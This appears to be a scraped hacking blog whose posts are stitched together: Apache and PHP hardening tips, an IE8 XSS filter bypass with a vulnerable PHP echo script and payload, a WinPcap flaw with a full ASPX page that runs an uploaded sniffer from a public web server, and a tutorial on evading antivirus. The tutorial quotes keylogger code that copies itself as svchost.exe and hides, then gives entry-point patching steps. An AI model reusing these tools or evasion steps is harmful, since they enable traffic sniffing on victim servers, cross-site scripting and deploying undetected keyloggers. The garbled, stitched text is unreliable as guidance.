Is your Apache in safe mode ?

This Post is a bit review to Apache security and not contain all details but i want write all of them.

When you decide to build a web server based on Open source Os for all web publishing -public or private- all the futures not needed . But sometimes some of them mus tow change carefully. We have to case of Apache using here :

Case 1 : In some cases you need to build a simulated ftp server based on HTTP protocol.

Case 2 : You need to build a MAIL server with HTTP interface. Such as HORD or SQURRIER MAIL.

SO what changes needed ?what kind of futures are usable here for Your jobs ?.

In default installation of Apache -as so useful web server – in a big range of open source operating systems you may see auto indexing and directory browsing , its good for HTTP server as FTP server but is it usable as HTTP-mail server ? Of curse response is NO .Why ? Its so simple .In case 1 you just need to give the permission to your users for reading files and browsing directories JUST!.And denied them to reading or browsing other directories . In case 2 the server design may have a complete configuration with case 1 .Here You must use an interpreter for your scripts and language .So is your directory browsing options may not denied is it possible ?.In example an attacker can change his directory to upper or can see most important data such as web server configurations and – or – some log files or a high level script kiddie could copy you password to anywhere .Now your web server is really crackable and an attacker can read your configurations and may change THEM !!. What did you do ? its so good question .

1- You can change permission of all unneeded directories to deny for other users and groups like :

“[[email protected]] # chmod -R 700 some directory that you want to hidden from other ”

2- Change the permission of your files to only readable for www and not executable – if you want to use HTML pages – and for script based pages

do “[[email protected]]# 644 *.php or other scripts
3- If your server pages is PHP you can change a bit the php.ini file

its in my machine :

[[email protected] /usr/home/t4z3v4r3d]# cat /usr/local/etc/php.ini | grep basedir
; open_basedir, if set, limits all file operations to the defined directory
open_basedir = /usr/local/www
[[email protected] /usr/home/t4z3v4r3d]#

open_basedir = /usr/local/www to the your www directory this is he way of blocking of some php-shell scripts lik c99.php.

what the php shells cand do ?

what the php shells cand do ?

Hi this is 2′nd part of Apache security .
We want to look how to safe all of our scripts when we have some sites.
In share servers – commercial servers – we can secure our serer by some applications such as Cpanel Plesk or etc.
But how can we secure it by hand ?.Of curse its not so simple but its not hard to do.
Ok lets to see what we can do ?.Let look to this how to from an attacker.
Any of attacker want to get some information to doing a successful attack to any server.
But what is information exactly ?yes any information its correct !,all information may help the attacker to entering in to your server .
What kind of web server , web server version , Os version and type,mod ‘s of your web server is running  , server admin’s mail , dns-server , and …. is a good information to starting an attack.

some of the information can’t be hidden but some of may hidden !!!.
Ok we can change our server’s operating system name , web server name and type and version by some tools and mods – soon – .

All attacks methods are depend  to security of your server .

Ok we have some changes in our apache configuration.
But is it enough?. At the same way :what is the set of security settings for
Apache?.Security is a complex of invisible or bit notes.You can’t deny web viewers to looking your web contents in a little range of time .-in fact you can’t tell to users : Do brows my web contents only one time – but you can denied them to browsing all site in a little range of time  – or attacking such as directory traversal attacks or denial of service attack – .This attack can give a large amount of server resources .you can detect this attack and ban the attacker . Apache developed by some modules now, we can select our needed modules for protection.
Modules may be a helpful tools if you have enough information about how to work this module .Apache have 3 release version : 1.3.X and 2.0.X and 2.X all of this versions can using some modules.
For any platforms that you want to work on it may you need to some changes in configurations and giving resources to web server or changing in firewall rules and etc … . But you are module selector and you are lord of Apache world .Deciding which modules are needed is your job and tuning Apache is your art .
Its end of section one for now because I have no time to continue . i’ll be back very soon – iwant build a http server on my bsd box all of notes are really -In the next section we look for details .

internet explorer 8 XSS filter bypassing

IE8 is a new Microsoft browser, the integrity of its CSS2.1 support, HTML5 support,
built-in development tools and so on. IE8 in the browser security on a very big improvement, not a
built-in unloading the Xss Filter, non-durable type of cross-site scripting attacks do a relatively good
protection. However, 80 sec in the test IE8 found, IE8 the Xss Filter there are Vuln, resulting
in some version of the eastern countries simply can not stop the URL Xss for example,
in the Persian version, use some simple data can Bypass Filter out the strategy IE8.

Vulnerability analysis: As IE8 Xss Filter in the filter to take the coding system is built-in encoding,
in the Persian version will be gb2312, in some other Eastern countries will adopt the appropriate wide-byte coding.
Submitted a non-coding sequences such as% c1 <will be IE8 as a normal character for the East Filter keyword matching,
and in the pages displayed, because of their pages will be designated a UTF-8 encoding for example, in the analytical
time % c1 <is not a valid UTF8 encoding, this will be treated as two characters,resulting in a <bypass the check, this inconsistency has led to the formation of Vuln.
Vuln that: assume that there are web script:


<?php
header("Content-Type: text/html; charset=utf-8");
echo $_GET[c];
?>

In the east of the country IE8 system, if the conduct of conventional XSS such as:

.php?c=<script>alert()</script>

IE8 security strategy will be to stop, but if the
The code can bypass the ie8 xss filter and implementation.

vulnerability state: this vulnerability reported to microsoft (by chinese hacker ) and is awaiting a response.

bug in winpcap

BUG IN WINPCAP

I feel God Is here .

Hi dear , I’M Daphne , My job is Penetration Tester (Pen-Tester) , I write About This Subject and Around  .

Pent-Test is Cool & funny job with hacking interesting subject.

anyway ….

I use winpcap 4.2(last version)

http://www.winpcap.org/install/default.htm

what is winpcap :

WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture.

WinPcap consists of a driver, that extends the operating system to provide low-level network access, and a library that is used to easily access the low-level network layers. This library also contains the Windows version of the well known libpcap Unix API.

How to load winpcap in windows :

BUG :

when Administrator or Other Power users in windows summon winpcap driver (such as wireshake or nmap or cain or …) driver loaded !

but , when close program , winpcap driver still in memory , That’s it .

when driver not unload , Guest user or IIS_User can load this driver in kernel level , and SNNIFF Admin Packet in administrator Level or get  Administrator privilege .

I sniff packet with win dump in guest mod .
http://www.winpcap.org/windump/install/default.htm

Ok , I write This little tools for iis7 – iis6 in windows 2003 – 2008 :

usage :

load wireshake or other tool that run winpcap driver .

rename windump.exe to packet.exe and upload near winpcap.aspx and run it .

and then you can sniffed packed in 1.txt /

winpcap.aspx

<%@ Page Language=”VB” Debug=”true” %>
<%@ import Namespace=”system.IO” %>
<%@ import Namespace=”System.Diagnostics” %>
<script runat=”server”>
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
‘ Change Path Of tcpdump
Dim myProcessStartInfo As New ProcessStartInfo(Server.MapPath(”packet.exe”))
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xCmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,”<”,”&lt;”)
mystring=replace(mystring,”>”,”&gt;”)
result.text= vbcrlf & “<pre>” & mystring & “</pre>”
End Sub</script>
<form runat=”server”>
New Method Of Packet Sniffing In web whith Public Accesss .
<br />
This Program Run is AS IS !
<strong><span class=”style-2″>Serve rip</span></strong> :<span class=”style-2″>  <%=request.ServerVariables(”LOCAL_ADDR”)%></span><br>
<strong><span class=”style-2″>Machine Name</span></strong> :<span class=”style-2″> <%=Environment.MachineName%></span><br>
<strong><span class=”style-2″>Network Name</span></strong> :<span class=”style-2″> <%=Environment.UserDomainName.ToString()%></span><br>
<strong><span class=”style-2″>User Name</span></strong> :<span class=”style-2″> <%=Environment.UserName%></span> <br>
<strong><span class=”style-2″>OS Version</span></strong> :<span class=”style-2″> <%=Environment.OSVersion.ToString()%></span><br>
<strong><span class=”style-2″>IIS Version</span></strong> :<span class=”style-2″> <%=request.ServerVariables(”SERVER_SOFTWARE”)%></span><br>
<strong><span class=”style-2″>HTTPS</span></strong> <span class=”style-2″>: <%=request.ServerVariables(”HTTPS”)%></span><br>
</tr>
<br />
Tested On Windows vista , IIS7 .
<br />
<h5>Discover By “DAPHNE IDEA SECURITY ” .</h5>
<br />
Exp: -i 6 -w “c:\windows\temp\packet.txt”
<hr />
<asp:Label id=”L_p” style=”COLOR: #0000ff” runat=”server” width=”80px”>TCP DUMP PATH:</asp:Label>
<br />
<label><%=Server.MapPath(”packet.exe”)%></label>
</asp:TextBox>
<br />
<asp:Label id=”L_a” style=”COLOR: #0000ff” runat=”server” width=”80px”>Arguments</asp:Label>
<asp:TextBox id=”xcmd” style=”BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid” runat=”server” Width=”300px”>-D</asp:TextBox>
<br />
<br />
<asp:Button id=”Button” style=”BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #000000″ onclick=”runcmd” runat=”server” Width=”100px” Text=”DUMP PAcket”></asp:Button>
<p>
<asp:Label id=”result” style=”COLOR: #0000ff” runat=”server”></asp:Label>
</p>
</form>

this tools is sample .

in future i speak about how to Privilege escalation with kartoffell tools in drivers .;)

undetect malwares , virues from anti-virues

In the name of god
Hi, I’m MrXX and in this blog I want to talk about the some coding, reversing and more…

And please don’t post the some shit comment in the index, because we going to delete it
And please don’t spam us with Noob question, cause they don’t answer the Noob
And the last think sorry about the English, cause I can’t even talk in English (I just can read) by the way

In the first, I want to talk about some reversing (I tired and seek and my mind wasn’t work correctly)
This is not my tut by I search over the web 2 or 3 day to find the best way & I think this is best way (original tut by : Kenny)

To undetected the malware from antivirus

First we need tools
1-Hex editor: I use the HIEW (not the 32 bit ver)
2-PE Tools: I use the PE Tools v1.5
3-UPX
4-Cracker call this BRAIN (I think I got it by I can’t give it to u, go find yours)  :)
If u don’t know what is those tools and how u can use it: I tell u go f.u.c.k yourself and please don’t read this
Ok , I read the magic world and dorooooororooooooo : oh my god magic happen :) , my f.u.c.k.ing malware undetected , ha ha ha ha I’m kidding there is no magic & magic is just some shit , every think in this whole world have the logical reason (I don’t believe magic)
Make malware (Trojan,rootkit,virus,…) undetected just have some little ways and if u like it I tell all the possible way to make our malware tools undetected ,but I tell it 1 by 1 , and if I see some , kididi mididi tnx in the comment I tell the next magic world
Let’s pull the chair close to your PC and get started
I wrote my own keylogger many year ago , but god DAMN antivirus known my own private keylogger as the probably unknown NewHeur_PE virus

And nod want to submit this to them Database :(

Oh my god how could this happen :) , don’t worry about that I tell u next time how u can bypass the stupid antivirus with some cryptography
In this time I want to undetected the binary file (u can use this to make all the binary malware u don’t have them source)
See the virustotal result: that’s nasty

And u will see, some of antivirus detect the malware and some of them don’t detected because is this private
Malware detected because of some of the line like:

Dim ModuleName As String, FileName As String, hInst As Long
ModuleName = String$(128, Chr$(0))
hInst = GetWindowWord(Me.hwnd, GWW_HINSTANCE)
ModuleName = Left$(ModuleName, GetModuleFileName(hInst, ModuleName, Len(ModuleName)))

If CheckPath(SystemDir + “svchost.exe”) = False Then
FileCopy ModuleName, SystemDir + “svchost.exe”
ShellExecute Me.hwnd, “open”, SystemDir + “svchost.exe”, vbNullString, vbNullString, SW_HIDE
End
End If

Or
Because the uses of those api

Private Declare Function SetWindowsHookEx Lib “user32″ Alias “SetWindowsHookExA” (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
Private Declare Function UnhookWindowsHookEx Lib “user32″ (ByVal hHook As Long) As Long
And…

Ok later we crypt those command and use the API very cleverly to bypass the Noob antivirus
Oh we talk some much let’s back to the undetected part
First we pack the file with UPX (do something else) and we open our packed file with the PE Tools

Open file and get some info about the entrypoint

Entry Point: 0000AD20
Image Base: 00400000

Now we open the packed file with HIEW in the disassemble mode we going to entry point
U will see some entry like this

This is the entry that was UPX make
When we scroll done some line we will see zero space, we use this for hexing our tool
Place those codes into the zero space
Use the edit F3/F2 command

push        00040AD20   <— push OEP
push        eax
pushfd                   <—for tricking AVP
pushad                    <—for tricking AVP
call       .000025154  <—– call for Ret 28h
retn 00028

The address depend on your system and those are not the static

After that , save the progress
And again add 2 line

INC ECX  <— Counter up
Loop 000022D9

Save them again
Ok our hexing finish , now we must go and change our entry point to the new entry
We open the PE Tools again change the entry point to the new value

OEP = entry address – imagebase(400000)

New entry:0040AED9

After that we unpack the file with UPX an it must be undetected from AV
This method called: changing the entry point for undetected the malware
That’s the nice way but we got the easy way to like Pack the file , hexing the Signature of the file and  …

In the next post I talk about ElF File’s And Reversing
Good Luck
MrXX

bypass antivirus with string crypting

yeah , as i say in the last post

in this tut you will learn to bypass some of the sutpid god DAMN antivirus with string Encrypt/Decrypt trick

DL Link

the next post will be : Undetect the malware from AV

another start

here is another info-sec blog via some security researchers we are really busy in these days in our small labs  but we hope can have efficiency result and update this blog with some interesting content . we are trying update this blog everyday and finally we accept all of your discretion and comments .

labs

labs

Get Adobe Flash playerPlugin by wpburn.com wordpress themes